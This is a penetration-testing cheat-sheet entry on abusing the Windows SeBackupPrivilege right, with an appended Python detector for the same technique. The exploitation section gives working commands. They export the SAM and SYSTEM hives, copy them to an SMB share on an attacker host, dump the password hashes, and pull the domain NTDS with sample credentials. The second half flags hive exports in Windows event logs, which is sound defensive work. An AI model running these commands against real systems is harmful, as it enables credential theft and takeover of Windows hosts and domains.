SeBackup
A Windows user right (SeBackupPrivilege) that lets a process bypass standard ACL checks to read files and registry hives for backup purposes. It is assigned by default to Administrators, Backup Operators and Server Operators, but it sits in the token in a disabled state; backup-aware tools (e.g. reg.exe, robocopy, ntbackup) explicitly enable it at runtime so they can read protected objects regardless of their ACLs.
Exploitation
Move to a writeable directory and copy the hives:

```
# Move to a writeable directory
cd c:\windows\temp
# Copy the SAM and SYSTEM hives
reg save hklm\sam c:\windows\temp\sam
reg save hklm\system c:\windows\temp\system
```

Transfer the hives to the attacking host (preferably via SMB rather than WinRM):

```
# Start an SMB server
sudo impacket-smbserver share -smb2support / -user test -password test
```

Connect and copy the hives:

```
# Connect to the share
net use z: \\<attacker-IP>\share /user:test test
# Copy the hives
copy sam z:\
copy system z:\
```

Dump the creds on the attacking host:

```
# Dump creds with impacket
impacket-secretsdump -sam sam -system system LOCAL
# Dump creds with pypykatz
pypykatz registry --sam sam system
```

If the credentials of a member of the Backup Operators group are available:

```
nxc smb 192.168.210.16 -u administrator -p Password123! --ntds vss
```
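As an added defensive example (not code from the original page): a small Python detector that flags the hive exports shown above in process-creation events and raises severity when the same account explicitly enabled SeBackupPrivilege beforehand. The pipe-separated record format, the account names and the sample events are constructed assumptions standing in for Windows Security log entries 4703 (user right adjusted) and 4688 (process created).

```python
import re

# Constructed sample events (not from the original page). Each line is a
# simplified "EventID|Account|Key=Value" record standing in for Windows
# Security log entries: 4703 (user right adjusted) and 4688 (process created).
SAMPLE_EVENTS = [
    "4703|CORP\\bkadmin|EnabledPrivilegeList=SeBackupPrivilege",
    "4688|CORP\\bkadmin|CommandLine=reg save hklm\\sam c:\\windows\\temp\\sam",
    "4688|CORP\\bkadmin|CommandLine=reg save hklm\\system c:\\windows\\temp\\system",
    "4688|CORP\\alice|CommandLine=reg query hklm\\software\\microsoft",
    "4688|CORP\\alice|CommandLine=reg.exe export hklm\\security c:\\sec.hiv",
    "4688|NT AUTHORITY\\SYSTEM|CommandLine=wbengine.exe",
]

# reg.exe save/export of the SAM, SYSTEM or SECURITY hive: together these
# are enough to recover local hashes and cached secrets offline.
HIVE_EXPORT = re.compile(
    r"\breg(?:\.exe)?\s+(?:save|export)\s+hklm\\(sam|system|security)\b",
    re.IGNORECASE,
)


def parse_event(line):
    """Split one constructed record into its id, account and single field."""
    event_id, account, field = line.split("|", 2)
    key, _, value = field.partition("=")
    return {"id": int(event_id), "account": account, "key": key, "value": value}


def find_hive_dumps(lines):
    """Return one alert per sensitive hive export. Severity is 'high' when the
    same account enabled SeBackupPrivilege earlier in the window (the explicit
    enable that backup-aware tools perform), otherwise 'medium'."""
    enabled_backup = set()
    alerts = []
    for event in map(parse_event, lines):
        if event["id"] == 4703 and event["key"] == "EnabledPrivilegeList":
            if "SeBackupPrivilege" in event["value"]:
                enabled_backup.add(event["account"])
        elif event["id"] == 4688 and event["key"] == "CommandLine":
            match = HIVE_EXPORT.search(event["value"])
            if match:
                alerts.append({
                    "account": event["account"],
                    "hive": match.group(1).lower(),
                    "severity": "high" if event["account"] in enabled_backup else "medium",
                })
    return alerts


if __name__ == "__main__":
    for alert in find_hive_dumps(SAMPLE_EVENTS):
        print(alert)
```

Event 4703 only appears when the "Audit Token Right Adjusted" subcategory is enabled and is very noisy, which is why it is used here to raise severity rather than as the trigger on its own.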